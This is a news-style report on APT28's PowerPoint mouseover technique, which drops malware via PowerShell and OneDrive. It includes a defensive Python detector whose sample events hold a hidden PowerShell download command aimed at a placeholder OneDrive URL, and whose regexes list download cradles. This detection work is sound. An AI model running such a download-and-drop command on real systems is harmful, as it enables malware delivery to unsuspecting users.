PowerPoint mouseover trick used by Russian state-sponsored hacking group APT28 to infect systems with malware
In a report, Cluster25 said the technique "is designed to be triggered when the user starts the presentation mode and moves the mouse. The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive."
The dropper is an image file that lets the malware gain a foothold on the victim's system and fetch further components from the Microsoft Graph API or OneDrive.
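One defender-side check that the description above suggests, written here as an added example rather than code from Cluster25's report: flag process-creation events in which an Office application (PowerPoint, and by extension Word and Excel) spawns a script host, and raise the severity when the command line also carries a download cradle or a Microsoft cloud-storage URL. The Sysmon-style event fields, the sample events and the placeholder URL are constructed for illustration.

```python
import re
from typing import Optional

# Constructed, illustrative process-creation events (Sysmon Event ID 1 fields,
# flattened to dicts); not real telemetry from the campaign described above.
SAMPLE_EVENTS = [
    {"ts": "2022-09-20T10:01:02Z", "host": "ws01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo slide-helper"},
    {"ts": "2022-09-20T10:01:05Z", "host": "ws01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"iwr https://1drv.ms/u/PLACEHOLDER -OutFile $env:TEMP\\pic.jpeg\""},
    {"ts": "2022-09-20T10:02:00Z", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

# Office apps that should almost never spawn a script host on a user workstation.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Common download cradles and the Microsoft cloud endpoints named in the report.
CRADLE_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I)
CLOUD_RE = re.compile(r"(onedrive\.live\.com|1drv\.ms|graph\.microsoft\.com)", re.I)

def basename(path: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev: dict) -> Optional[dict]:
    """Return a finding for an Office-spawned script host, or None."""
    if basename(ev["parent_image"]) not in OFFICE_PARENTS or basename(ev["image"]) not in SCRIPT_HOSTS:
        return None
    cmd = ev["command_line"]
    reasons = ["office app spawned script host"]
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle in command line")
    if CLOUD_RE.search(cmd):
        reasons.append("Microsoft cloud storage URL in command line")
    severity = "high" if len(reasons) > 1 else "medium"
    return {"ts": ev["ts"], "host": ev["host"], "severity": severity, "reasons": reasons}

def detect(events: list) -> list:
    """Run score_event over a batch of events and keep only the findings."""
    return [f for f in (score_event(e) for e in events) if f]
```

Calling `detect(SAMPLE_EVENTS)` yields a medium finding for the cmd.exe child and a high finding for the PowerShell download; the explorer-spawned PowerShell is not flagged.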
The malware can be delivered as a link in a lure document that appears to originate from the Organisation for Economic Co-operation and Development (OECD), which is based in France.
Cluster25 assesses that the campaign is still active, since the attackers' URLs have been in use for two months. The cybersecurity firm said the operation will likely target entities and individuals in the defence and government sectors of Europe and Eastern Europe.
This is not the first sighting of Graphite: according to Trellix, in January 2022 the same attack chain was used to exploit the MSHTML remote code execution vulnerability (CVE-2021-40444) to drop backdoors.
The development shows that APT28, also known as "Fancy Bear," continues to refine its hacking methods. This latest variant was written for a landscape in which exploits no longer work as often.